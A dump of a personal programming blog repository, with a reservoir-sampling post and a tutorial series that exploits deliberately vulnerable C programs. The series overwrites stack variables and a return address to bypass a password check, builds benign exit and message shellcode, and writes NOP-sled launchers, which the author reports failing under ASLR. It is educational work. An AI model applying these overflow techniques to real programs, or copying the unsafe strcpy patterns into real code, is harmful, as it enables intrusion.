├── README.md
├── algorithm-reservoir-algorithm.md
├── bug-hunter-stackoverflow.md
├── bug-hunter-stackoverflow2.md
├── bug-hunter-stackoverflow3.md
├── bug-hunter-stackoverflow4.md
├── c++-template-singleton.md
├── c-hello-world.md
├── decrease-resident-memory.md
├── how-to-write-a-self-repair-tcp-pool.md
├── how-to-write-a-tcp-server.md
├── image
│   ├── active_object
│   │   ├── .keep
│   │   ├── active_object_design.png
│   │   └── result.png
│   ├── c-hello-world
│   │   ├── .gitkeep
│   │   ├── Register386.png
│   │   ├── a.out-symbol.png
│   │   ├── exit-instruction.png
│   │   ├── instruction.png
│   │   ├── main.png
│   │   ├── memory-model.png
│   │   ├── reverse-a.out.png
│   │   ├── reverse-test.png
│   │   └── test.asm.png
│   ├── machine-learning
│   │   ├── backpropagation.png
│   │   ├── big_learning_rate.png
│   │   ├── cost.JPG
│   │   ├── cost_pic01.png
│   │   ├── cost_pic02.png
│   │   ├── covariance.png
│   │   ├── entropy.png
│   │   ├── euclidean_distance.png
│   │   ├── example_gradient.png
│   │   ├── function.png
│   │   ├── gini_impurity.png
│   │   ├── gradient.png
│   │   ├── gradient_descent.JPG
│   │   ├── hidden-layer-30.png
│   │   ├── hx.png
│   │   ├── k-means.png
│   │   ├── linear-regression-form.png
│   │   ├── linear_example.JPG
│   │   ├── logistic_regression_cost.png
│   │   ├── logistic_regression_cost_gradient.png
│   │   ├── mse.png
│   │   ├── pearson_correlation.png
│   │   ├── regular_logistic_regression_cost.png
│   │   ├── regular_logistic_regression_cost_gradient.png
│   │   ├── sigmoid_function.png
│   │   ├── standard_deviation.png
│   │   ├── train.png
│   │   ├── train2.png
│   │   └── word_vector.png
│   ├── memory_management
│   │   ├── .keep
│   │   ├── heapAllocation.png
│   │   ├── heapMapped.png
│   │   ├── kernelUserMemorySplit.png
│   │   ├── linuxClassicAddressSpaceLayout.png
│   │   ├── linuxFlexibleAddressSpaceLayout.png
│   │   ├── malloc_chunk.png
│   │   ├── mappingBinaryImage.png
│   │   ├── memoryDescriptorAndMemoryAreas.png
│   │   ├── mm_struct.png
│   │   ├── pagedVirtualSpace.png
│   │   ├── virtualMemoryInProcessSwitch.png
│   │   └── x86PageTableEntry4KB.png
│   ├── peterson_lock
│   │   ├── .keep
│   │   └── peterson_gdb.png
│   ├── pthreads
│   │   ├── .keep
│   │   ├── NUMA.png
│   │   ├── UMA.png
│   │   ├── cpu_cache.png
│   │   └── multi_processor.png
│   ├── stackoverflow
│   │   ├── .keep
│   │   ├── getenv.png
│   │   ├── main_assembly.png
│   │   ├── ret_addr.png
│   │   └── variable_distance.png
│   └── syn-flood
│       ├── .gitkeep
│       ├── backlog.png
│       ├── half-connection.png
│       ├── ip_header.png
│       ├── ip_packat_sample.png
│       ├── syn-packet.png
│       └── tcp_header.png
├── machine-learning-decision-trees.md
├── machine-learning-euclidean-distance.md
├── machine-learning-k-means.md
├── machine-learning-linear-regression-calculation.md
├── machine-learning-linear-regression.md
├── machine-learning-logistic-regression.md
├── machine-learning-neural-networks-digit-recognition.md
├── machine-learning-pearson-correlation.md
├── machine-learning-search-and-rank.md
├── machine-learning-stochastic-gradient-descent.md
├── machine-learning-word-vector.md
├── memory-management.md
├── parallel-programming-active_object_design_pattern.md
├── parallel-programming-peterson_lock_report.md
├── parallel-programming-pthreads1.md
├── parallel-programming-pthreads2.md
├── syn-flood.md
├── system-monitor.md
└── you-really-know-how-to-write-singleton.md
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Welcome To Charles's Awesome Blog
================================

- [Home](https://github.com/linghuazaii/blog/wiki)
- [Memory management every engineer needs to know](https://github.com/linghuazaii/blog/wiki/Memory-management-every-engineer-needs-to-know)
- [SYN-Flood简易实现和原理解析](https://github.com/linghuazaii/blog/wiki/SYN-Flood%E7%AE%80%E6%98%93%E5%AE%9E%E7%8E%B0%E5%92%8C%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90)
- [Server-Benchmarking](https://github.com/linghuazaii/blog/wiki/Server-Benchmarking)
- [[新手乐园]和我一起学C - Hello World](https://github.com/linghuazaii/blog/wiki/%5B新手乐园%5D和我一起学C---Hello-World)
- [Simple C++ Template Singleton Class](https://github.com/linghuazaii/blog/wiki/Simple-C---Template-Singleton-Class)
- [[Bug Hunter]关于stack overflow Lesson
I](https://github.com/linghuazaii/blog/wiki/%5BBug-Hunter%5D关于stack-overflow-Lesson-I)
- [[Bug Hunter]关于stack overflow Lesson II](https://github.com/linghuazaii/blog/wiki/%5BBug-Hunter%5D%E5%85%B3%E4%BA%8Estack-overflow-Lesson-II)
- [[Bug Hunter]浅说shellcode](https://github.com/linghuazaii/blog/wiki/%5BBug-Hunter%5D%E6%B5%85%E8%AF%B4shellcode)
- [[Parallel Programming]Peterson Lock 研究报告](https://github.com/linghuazaii/blog/wiki/%5BParallel-Programming%5DPeterson-Lock-%E7%A0%94%E7%A9%B6%E6%8A%A5%E5%91%8A)
- [[Parallel Programming]Active Object Design Pattern](https://github.com/linghuazaii/blog/wiki/%5BParallel-Programming%5DActive-Object-Design-Pattern)
- [[Bug Hunter]关于stack overflow Lesson III](https://github.com/linghuazaii/blog/wiki/%5BBug-Hunter%5D%E5%85%B3%E4%BA%8Estack-overflow-Lesson-III)
- [[Parallel Programming]深入PThread (Lesson I)](https://github.com/linghuazaii/blog/wiki/%5BParallel-Programming%5D%E6%B7%B1%E5%85%A5PThread-(Lesson-I))
- [[Parallel Programming]深入PThread (Lesson II)](https://github.com/linghuazaii/blog/wiki/%5BParallel-Programming%5D%E6%B7%B1%E5%85%A5PThread-(Lesson-II))
- [[Machine Learning]Euclidean Distance](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DEuclidean-Distance)
- [[Machine Learning]Pearson Correlation](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DPearson-Correlation)
- [[Algorithm]百度:蓄水池抽样](https://github.com/linghuazaii/blog/wiki/%5BAlgorithm%5D%E7%99%BE%E5%BA%A6%EF%BC%9A%E8%93%84%E6%B0%B4%E6%B1%A0%E6%8A%BD%E6%A0%B7)
- [[Machine Learning]Word Vector](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DWord-Vector)
- [[Machine Learning]K-Means](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DK-Means)
- [[Machine Learning]Search And Rank](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DSearch-And-Rank)
- [[Machine Learning]Decision
Trees](https://github.com/linghuazaii/blog/wiki/%5BMachine-Learning%5DDecision-Trees)
- [怎么从无到有写一个好的TCP Server](https://github.com/linghuazaii/blog/wiki/%E6%80%8E%E4%B9%88%E4%BB%8E%E6%97%A0%E5%88%B0%E6%9C%89%E5%86%99%E4%B8%80%E4%B8%AA%E5%A5%BD%E7%9A%84TCP-Server)
- [怎样写一个自修复的TCP连接池](https://github.com/linghuazaii/blog/wiki/%E6%80%8E%E6%A0%B7%E5%86%99%E4%B8%80%E4%B8%AA%E8%87%AA%E4%BF%AE%E5%A4%8D%E7%9A%84TCP%E8%BF%9E%E6%8E%A5%E6%B1%A0)
- [你真的知道怎么写Singleton吗?](https://github.com/linghuazaii/blog/wiki/%E4%BD%A0%E7%9C%9F%E7%9A%84%E7%9F%A5%E9%81%93%E6%80%8E%E4%B9%88%E5%86%99Singleton%E5%90%97%EF%BC%9F)
- [Linear Regression(线性回归)](https://github.com/linghuazaii/blog/wiki/Linear-Regression(%E7%BA%BF%E6%80%A7%E5%9B%9E%E5%BD%92))
- [Linear Regression矩阵计算](https://github.com/linghuazaii/blog/wiki/Linear-Regression%E7%9F%A9%E9%98%B5%E8%AE%A1%E7%AE%97)
- [Andrew NG. Logistic Regression小结与示例](https://github.com/linghuazaii/blog/wiki/Andrew-NG.-Logistic-Regression%E5%B0%8F%E7%BB%93%E4%B8%8E%E7%A4%BA%E4%BE%8B)
- [Stochastic Gradient Descent](https://github.com/linghuazaii/blog/wiki/Stochastic-Gradient-Descent)
- [Neural Networks Backpropagation做MNIST数字识别](https://github.com/linghuazaii/blog/wiki/Neural-Networks-Backpropagation%E5%81%9AMNIST%E6%95%B0%E5%AD%97%E8%AF%86%E5%88%AB)
--------------------------------------------------------------------------------
/algorithm-reservoir-algorithm.md:
--------------------------------------------------------------------------------
[Algorithm] Baidu Interview: Reservoir Sampling
===========================

### Preface
  I was once asked this question in a Baidu interview. Reservoir sampling can be asked in ten thousand different ways, but they all boil down to the same thing. You are given a data set of unknown size, where counting the total would be expensive (say, counting how many lines there are in 100 TB of log files), and you are asked to pick K records at random such that every record has an equal probability of being selected.

### Probability and Statistics
  First consider this question: given **N** numbers, if we pick **K** of them, what is the probability that the **i**-th number gets picked?
  The number of ways to choose **K** out of **N** numbers is `Cr(N, K) = Pr(N, K) / K! = N! / ((N - K)! * K!)`.
  If the **i**-th number is already chosen, the number of ways to choose the remaining **K - 1** from the other **N - 1** numbers is `Cr(N - 1, K - 1) = Pr(N - 1, K - 1) / (K - 1)! = (N - 1)! / ((N - 1 - (K - 1))! * (K - 1)!) = (N - 1)! / ((N - K)! * (K - 1)!)`.
  So the probability that the **i**-th number is chosen is `p(i) = Cr(N - 1, K - 1) / Cr(N, K) = K / N`.

### Randomly selecting one record
  Start with a simpler problem: from **N** records, with **N** unknown, pick one at random. How do we guarantee each record is picked with probability `1/N`?
1. Take the first record.
2. Keep the **i**-th record, when it arrives, with probability **1/i**.
3. Discard the **i**-th record with probability **(i - 1)/i**.

  The probability that the first record ultimately survives is `p(1) = 1/2 * 2/3 * 3/4 * ... * (N - 1)/N = 1/N`.
  The probability that the **i**-th record ultimately survives is the probability that **i** is kept and every later record is discarded, i.e. `p(i) = 1/i * i/(1+i) * (i+1)/(i+2) * ... * (N-1)/N = 1/N`.
  Following these steps we never need to know **N**: one pass over the data yields a random value, and every record is selected with probability **1/N**.

### Randomly selecting K records
  To give every record probability **K/N** of being selected, reason as follows: the last record must be kept with probability **K/N**, which suggests the **i**-th record should be kept with probability **K/i**.
1. Take the first K records, then consider **i > K**.
2. Keep the **i**-th record with probability **K/i** ("keep" here does not mean it ends up in the final sample).
3. Discard the **i**-th record with probability **(i-K)/i**.
4. A later record **m (m > i)** fails to replace the **i**-th record with probability `(m-k)/m + k/m * (k-1)/k = (m-1)/m`, i.e. the probability that **m** is discarded plus the probability that **m** is kept but replaces a slot other than the one holding record **i**.

  The probability that the **i**-th record makes it into the final sample is therefore `p(i) = K/i * i/(i+1) * (i+1)/(i+2) * ... * (N-1)/N = K/N`.
  Among the first **K** records, the **k**-th survives with probability `p(k) = K/(K+1) * (K+1)/(K+2) * ... * (N-1)/N = K/N`, meaning none of the later records ever replaces it.

### Pseudocode and an example
**Pseudocode**
```c
/*
  S has items to sample, R will contain the result
*/
ReservoirSample(S[1..n], R[1..k])
  // fill the reservoir array
  for i = 1 to k
      R[i] := S[i]

  // replace elements with gradually decreasing probability
  for i = k+1 to n
      j := random(1, i)   // important: inclusive range
      if j <= k
          R[j] := S[i]
```

[Test code](https://github.com/linghuazaii/algorithm_testing/blob/master/reservoir.cpp)
**Test results**
```
=========== data ===========
92 51 11 69 24 35 17 36 26 98 67 39 83 2 75 56 59 18 32 40 91 86 57 12 14 42 27 62 63 58 30 96 13 68 3 87 71 64 9 22 66 80 20 79 89 81 73 0 94 41 88 28 52 43 16 60 49 7 84 72 29 61 6 45 53 76 8 33 37 15 25 55 70 31 82 47 48 10 90 34 23 74 77 19 85 44 93 54 97 1 38 95 4 21 99 5 78 65 50 46
============================================
=========== random k ===========
77 79 4 97 95 42
============================================

=========== data ===========
92 51 11 69 24 35 17 36 26 98 67 39 83 2 75 56 59 18 32 40 91 86 57 12 14 42 27 62 63 58 30 96 13 68 3 87 71 64 9 22 66 80 20 79 89 81 73 0 94 41 88 28 52 43 16 60 49 7 84 72 29 61 6 45 53 76 8 33 37 15 25 55 70 31 82 47 48 10 90 34 23 74 77 19 85 44 93 54 97 1 38 95 4 21 99 5 78 65 50 46
============================================
=========== random k ===========
60 65 80 86 50 59
============================================

=========== data ===========
92 51 11 69 24 35 17 36 26 98 67 39 83 2 75 56 59 18 32 40 91 86 57 12 14 42 27 62 63 58 30 96 13 68 3 87 71 64 9 22 66 80 20 79 89 81 73 0 94 41 88 28 52 43 16 60 49 7 84 72 29 61 6 45 53 76 8 33 37 15 25 55 70 31 82 47 48 10 90 34 23 74 77 19 85 44 93 54 97 1 38 95 4 21 99 5 78 65 50 46
============================================
=========== random k ===========
92 9 28 65 19 75
============================================
```

### Reference
- [Reservoir sampling](https://en.wikipedia.org/wiki/Reservoir_sampling)

### Wrap-up
  **GOOD LUCK, HAVE FUN!**
--------------------------------------------------------------------------------
/bug-hunter-stackoverflow.md:
--------------------------------------------------------------------------------
[Bug Hunter] About stack overflow, Lesson I
=======================================

### Preface
  You, me, and every so-called senior engineer or expert out there: all of us, sooner or later, carelessly write terrible code and leave behind pits worth hundreds of thousands, millions, even tens of millions. This is the first lesson; as a newbie myself, I'm sharing it so we can learn together.
  Maybe you think you already know the stack well, but let me nag anyway. Everyone knows the stack is LIFO; what people often don't know are the details of how everyday function calls and local variables actually use it. I'll only touch on that briefly here.

### About the stack
  Write a trivial C program containing just one function definition, call it from `main`, and compile with `-g`. Then run `gdb -tui`, use `set disassembly intel` to switch to Intel syntax (a matter of taste; most people find AT&T syntax a bit awkward), `layout asm` to view the assembly, `break main` or `break *_start`, and step with `ni`. You'll see how the stack gets used: on entering each function, the current ESP is saved into EBP, and ESP then points at the new function's stack frame; this is the ENTER operation. Local variables are pushed one by one, and before `ret` the function executes `leave`, the inverse of ENTER. Before entering `main`, EBP holds 0x0: the bottom of the stack. This tidbit isn't strictly needed for this article, but tall buildings rise from flat ground: the closer your understanding is to the essence, the simpler things look to you. I'm not fond of how today's "senior" engineers reach for open-source frameworks at every turn; to build a good wheel yourself, you have to build from the bottom up. That's why I started from low-level parallel programming, from the von Neumann model: how SISD evolved into SIMD and then MIMD, how UMA became NUMA, what problems each step solved and how. Those are the essential questions. Now, back to the topic!

### Example source
```c
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    int value = 5;
    char buffer_one[8], buffer_two[8];

    strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */
    strcpy(buffer_two, "two"); /* Put "two" into buffer_two.
*/

    printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

    printf("\n[STRCPY] copying %zu bytes into buffer_two\n\n", strlen(argv[1]));
    strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two. */

    printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
    printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
    printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

    if (value == 5)
        printf("execute as expected!\n");
    else if (value == 1801675112)
        printf("hacked, now we can do a little bad things at this branch!!!\n");
    else
        printf("execute unexpected, fucked up!\n");

    return 0;
}
```
  If you look closely, you'll notice this uses `strcpy` rather than `strncpy`, and there is even a `strcpy(buffer_two, argv[1])`, which makes it trivial to construct a stack overflow. In a large project this kind of bug hides much deeper; otherwise there wouldn't be so many 0-day vulnerabilities. Compile it with `gcc example.c -o example`.
  First the normal case, `./example 123456`; the result:
> [BEFORE] buffer_two is at 0x7fff9fa850a0 and contains 'two'
> [BEFORE] buffer_one is at 0x7fff9fa850b0 and contains 'one'
> [BEFORE] value is at 0x7fff9fa850bc and is 5 (0x00000005)
>
> [STRCPY] copying 6 bytes into buffer_two
>
> [AFTER] buffer_two is at 0x7fff9fa850a0 and contains '123456'
> [AFTER] buffer_one is at 0x7fff9fa850b0 and contains 'one'
> [AFTER] value is at 0x7fff9fa850bc and is 5 (0x00000005)
> execute as expected!

  As for why `buffer_one` and `buffer_two` are 16 bytes apart rather than 8, I haven't fully figured it out; if you know, please enlighten me. From what we can see so far, `buffer_one` sits 16 bytes above `buffer_two`, and `value` sits 12 bytes above `buffer_one` rather than 4, which also puzzles me; again, corrections welcome. (My best guess: on x86-64, GCC keeps the stack 16-byte aligned and is free to pad and reorder locals, which would account for both gaps, but that is only a guess.) So here is my conjecture: if my input is 16 bytes long, then by the rules of `strcpy`, the first byte of `buffer_one` will be overwritten with 0x0. Run `./example 1234567890123456`; the result:
> [BEFORE] buffer_two is at 0x7ffd538796d0 and contains 'two'
> [BEFORE] buffer_one is at 0x7ffd538796e0 and contains 'one'
> [BEFORE] value is at 0x7ffd538796ec and is 5 (0x00000005)
>
> [STRCPY] copying 16 bytes into buffer_two
>
> [AFTER] buffer_two is at 0x7ffd538796d0 and contains '1234567890123456'
> [AFTER] buffer_one is at 0x7ffd538796e0 and contains ''
> [AFTER] value is at 0x7ffd538796ec and is 5 (0x00000005)
> execute as expected!

  Just as predicted. That means we can now control the contents of `buffer_one`. Run `./example 1234567890123456fuckedup`; the result:
> [BEFORE] buffer_two is at 0x7ffc299904f0 and contains 'two'
> [BEFORE] buffer_one is at 0x7ffc29990500 and contains 'one'
> [BEFORE] value is at 0x7ffc2999050c and is 5 (0x00000005)
>
> [STRCPY] copying 24 bytes into buffer_two
>
> [AFTER] buffer_two is at 0x7ffc299904f0 and contains '1234567890123456fuckedup'
> [AFTER] buffer_one is at 0x7ffc29990500 and contains 'fuckedup'
> [AFTER] value is at 0x7ffc2999050c and is 5 (0x00000005)
> execute as expected!

  As hoped, `buffer_one` now contains `fuckedup`, so we can go one step further and control the value of `value`, steering the program down a different branch. Run `./example '1234567890123456fucked up!!!1'`; the result:
> [BEFORE] buffer_two is at 0x7fff596de720 and contains 'two'
> [BEFORE] buffer_one is at 0x7fff596de730 and contains 'one'
> [BEFORE] value is at 0x7fff596de73c and is 5 (0x00000005)
>
> [STRCPY] copying 29 bytes into buffer_two
>
> [AFTER] buffer_two is at 0x7fff596de720 and contains '1234567890123456fucked up!!!1'
> [AFTER] buffer_one is at 0x7fff596de730 and contains 'fucked up!!!1'
> [AFTER] value is at 0x7fff596de73c and is 49 (0x00000031)
> execute unexpected, fucked up!

  Look up the character 1 in an ASCII table, in decimal and in hex. Everything is under control now, isn't it? Of course, what we've gained so far is still modest; we'll dig deeper step by step in later posts.

### A question for the reader
  One branch is left as an exercise for you, dear readers: what input would make the program execute the second branch? Open an issue on this project titled [Bug Hunter Lesson I] plus your answer; the first reader with the correct answer gets a 10-yuan WeChat red envelope from me ^_^! I'm poor and earn very little, please bear with me TAT

### Closing
  If you haven't followed yet, give me a follow, thanks! Have Fun! See You!
--------------------------------------------------------------------------------
/bug-hunter-stackoverflow2.md:
--------------------------------------------------------------------------------
[Bug Hunter] About stack overflow, Lesson II
=======================================

### Recap
  In the previous post we covered the basic principle of a stack overflow and how to use one to steer a program's logic. This lesson explores the bug's further uses in more depth. This series follows my own learning progress, so it may move slowly: I have work to do too, and I'm also a newbie.

### Example one
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
    int auth_flag = 0;
    char password_buffer[16];

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        printf("Usage: %s <password>\n", argv[0]);
        exit(0);
    }
    if(check_authentication(argv[1]))
{
        printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
        printf(" Access Granted.\n");
        printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
    } else {
        printf("\nAccess Denied.\n");
    }
}
```

  This example is a simple authentication check: if the argument is `brillig` or `outgrabe`, it prints `Access Granted.`. Obviously there is a stack overflow bug here too, in the `strcpy` call. On the stack, `auth_flag` is pushed first and `password_buffer` after it, so `auth_flag` sits at a higher address than `password_buffer`, which means we can overwrite its value. Build with `gcc example.c -o example -g` to produce the executable, then run `gdb -tui example` to gather the necessary information, shown below.

  The difference between the two addresses works out to 28 bytes, so we just need to write past those 28 bytes and then 4 more. First the normal case, `./example $(perl -e "print 'A' x 28")`; the result:

> Access Denied.

  Now overwrite the stack: `./example $(perl -e "print 'A' x 32")`; the result:

> -=-=-=-=-=-=-=-=-=-=-=-=-=-
> Access Granted.
> -=-=-=-=-=-=-=-=-=-=-=-=-=-
> Segmentation fault

  The stack got trashed, but mission accomplished.

### Example two
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
    char password_buffer[16];
    int auth_flag = 0;

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        printf("Usage: %s <password>\n", argv[0]);
        exit(0);
    }
    if(check_authentication(argv[1])) {
        printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
        printf(" Access Granted.\n");
        printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
    } else {
        printf("\nAccess Denied.\n");
    }
}
```
  The only difference from example one is that `password_buffer` and `auth_flag` have swapped places, so `auth_flag` now sits at a lower address than `password_buffer` and can no longer be overwritten this way. So what do we do?
  Remember the stack mechanics I described in Lesson I? A function call first pushes a frame, later `leave` unwinds it and `ret` returns; and the stack actually holds the address the function will return to, which gets loaded into EIP/RIP. Let's just look at it in `gdb`. First `gcc example2.c -o example2 -g`, then `gdb -tui example2 -q`.

  Note first that right after `call 0x40063d <check_authentication>` there is a test: the check on `check_authentication`'s return value. If we skip that test and execute the instruction at `0x4006ef` directly, the program prints `Access Granted`. Now let's see what return address is saved on the stack, shown below:

  The return address is `0x4006eb`, i.e. the instruction right after the `call`. We simply overwrite the return address with `0x4006ef`. Since my machine is x86-64 and therefore little-endian, the address bytes have to be written in reverse. Run `./example2 $(perl -e 'print "\xef\x06\x40\x00" x 3')`; the result:

> -=-=-=-=-=-=-=-=-=-=-=-=-=-
> Access Granted.
> -=-=-=-=-=-=-=-=-=-=-=-=-=-
> Segmentation fault


### Closing
  The takeaway this time: overwriting a function's return address is far more destructive than overwriting a variable's value, isn't it?
  If you haven't followed yet, give me a follow, thanks! Have Fun! See You!
--------------------------------------------------------------------------------
/bug-hunter-stackoverflow3.md:
--------------------------------------------------------------------------------
[Bug Hunter] A quick look at shellcode
========================================

### Recap
  In the previous post we went a step further with stack overflows, controlling program logic by overwriting a function's return address. This post gives a brief introduction to shellcode. It has no direct connection to the previous two posts for now, but in Lesson IV I'll combine shellcode with the stack overflow bug.

### About shellcode
  So what is shellcode? Shellcode is simply a piece of executable binary code. An executable's code segment, the `.text` section, is read-only. Given that we can't modify `.text`, how do we execute code of our own? Through the stack, which the previous two posts kept coming back to. In this post's example, though, the shellcode isn't placed on the stack but in the `.data` section, because `const char code[]` is an initialized global. That doesn't affect the conclusion; move it into `main` if you like, the result is the same.

### A shellcode test harness
```c++
/* shellcodetest.c */
const char code[] = "bytecode will go here!";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
}
```
  This code is fairly simple, but a little explanation: at the assembly level, a function name is just a label, a stand-in for a concrete address. Execution follows addresses, and what an address holds is CPU instructions; our shellcode is CPU instructions, as I'll show below. So the example casts the address of `code` to a function pointer and calls it, which executes our shellcode. Now that the principle is clear, try running the harness as-is. Predictably, `code`'s bytes are not valid CPU instructions, so it triggers a segmentation fault. Compile and run the snippet above and the result is:
> Segmentation fault

### Testing a working shellcode
```asm
; exit.asm
[SECTION .text]
global _start
_start:
    xor eax, eax
    mov al, 1
    mov ebx, 10
    int 0x80
```
  This assembly just performs the system call `sys_exit(10)`. Here is the x86 system call table: [Linux System Call Table](https://www.informatik.htw-dresden.de/~beck/ASM/syscall_list.html). First generate the shellcode: `nasm -f elf exit.asm`, then `ld
exit.o -o exiter -melf_i386`, then `objdump -d exiter >log`. Here are the contents of the log file:
> exiter: file format elf32-i386
> Disassembly of section .text:
> 08048060 <_start>:
> 8048060: 31 c0 xor %eax,%eax
> 8048062: b0 01 mov $0x1,%al
> 8048064: 31 db xor %ebx,%ebx
> 8048066: cd 80 int $0x80

  So `\x31\xc0\xb0\x01\x31\xdb\xcd\x80` is the CPU instruction sequence we're after, the so-called shellcode. We can extract the shellcode from `objdump` output directly with a tool: [odfhex](https://github.com/linghuazaii/hacking-stuff/tree/master/odfhex). The code is simple too (and, to be clear, I'm not its author). Running `./odfhex log` gives:
> Odfhex - object dump shellcode extractor - by steve hanna - v.01
> Trying to extract the hex of log which is 279 bytes long
> "\x31\xc0\xb0\x01\xbb\x0a\x00\x00\x00\xcd\x80";
> 11 bytes extracted.

  Replace the contents of `code[]` with this shellcode, compile and run: no segmentation fault, the program exits normally, and `echo $?` in the shell shows a return code of 10, proof that our shellcode executed.

### A simple "hello hacking world" example
```
;hello.asm
[SECTION .text]
global _start
_start:
    jmp short ender

starter:
    xor eax, eax    ;clean up the registers
    xor ebx, ebx
    xor edx, edx
    xor ecx, ecx

    mov al, 4       ;syscall write
    mov bl, 1       ;stdout is 1
    pop ecx         ;get the address of the string from the stack
    mov dl, 20      ;length of the string
    int 0x80

    xor eax, eax
    mov al, 1       ;exit the shellcode
    xor ebx, ebx
    int 0x80

ender:
    call starter    ;put the address of the string on the stack
    db 'hello hacking world',0x0a
```
  A quick walk-through of this assembly: execution starts at `_start`; the local data is the string `hello hacking world\n` (`0x0a` is `\n`). `call` pushes the address of the next "instruction", here the string, onto the stack, then jumps to `starter`. The registers are cleared (`xor` is a fast way to zero a register), then `sys_write` is invoked, then `sys_exit()`. Build hello.asm: `nasm -f elf hello.asm`, then `ld hello.o -o hello -melf_i386`, then `objdump -d hello >log`, then `./odfhex log`; the result:
> Odfhex - object dump shellcode extractor - by steve hanna - v.01
> Trying to extract the hex of log which is 1265 bytes long
> "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14"\
> "\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65"\
> "\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64"\
> "\x0a";
> 52 bytes extracted.

  Write this shellcode into the `code[]` array, compile and run; the result:
> hello hacking world

### Looking ahead
  The examples above only illustrate the basic principle of shellcode. Now imagine: what if the process executing our shellcode runs as root? We could easily craft a shellcode that hands us a shell on the target machine, and then do anything; the machine is now our zombie. Next time I'll combine shellcode with a stack overflow. Shellcode is a very deep topic in its own right and we've barely scratched the surface here; if you're interested, look at [The Shellcoder's Handbook](https://www.amazon.com/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X).

### Closing
  If you haven't followed yet, give me a follow, thanks! Have Fun! See You!
--------------------------------------------------------------------------------
/bug-hunter-stackoverflow4.md:
--------------------------------------------------------------------------------
[Bug Hunter] About stack overflow, Lesson III
==========================================

### This post examines whether a stack overflow bug can really be used to execute shellcode
  In an earlier post I promised a write-up combining the stack overflow bug with shellcode. At my current level of knowledge, I can't pull that off yet. Here is why:

  See [Address space layout randomization (ASLR)](https://en.wikipedia.org/wiki/Address_space_layout_randomization): when a program runs, the stack's starting address sits at a random offset from the top of the process's virtual memory, different every time and very hard to predict. Here is a simple test program:
```cpp
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) {
    printf("%s is at %p\n", argv[1], getenv(argv[1]));

    return 0;
}
```
  At startup, all environment variables are stored on the stack. Run this example several times and you'll find that the result differs on every run, and by a large margin, as the figure showed.

### The example program containing the stack overflow
```cpp
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char buffer[100];
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    return 0;
}
```

### Attempt one
```cpp
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64\x0a";

int main(int argc, char **argv) {
    unsigned int i, *ptr, ret, offset = 377;
    char *command, *buffer;
    command = (char *)malloc(200);
    memset(command, 0, 200);

    strcpy(command, "./overflow_shellcode \'");
    buffer = command + strlen(command);

    if (argc > 1)
        offset = atoi(argv[1]);

    ret = (unsigned int)&i - offset;

    for (i = 0; i < 160; i += 4)
        *((unsigned int *)(buffer + i)) = ret;
    memset(buffer, 0x90, 60);
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
    strcat(command, "\'");

    system(command);
    free(command);

    return 0;
}
```
  Clearly, this attempt can only succeed if the `fork`ed child shares the parent's stack base. Testing shows it plainly does not: the new process gets its own randomized stack base.

### Attempt two
  Put the SHELLCODE into an environment variable, pad it with a very large number of `0x90` (`nop`) instructions, and guess the shellcode's address on the stack. Unsurprisingly: failure.

### Attempt three
```cpp
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

int main(int argc, char **argv) {
    char *env = getenv("SHELLCODE");
    uint64_t i, ret;
    ret = uint64_t(env);
    //printf("%c\n", env[0]);
    printf("%p\n", ret);
    char *buffer = (char *)malloc(160);
    for (i = 0; i < 160; i += 8)
        *((uint64_t *)(buffer + i)) = ret;

    execle("./overflow_shellcode", "overflow_shellcode", buffer, 0);
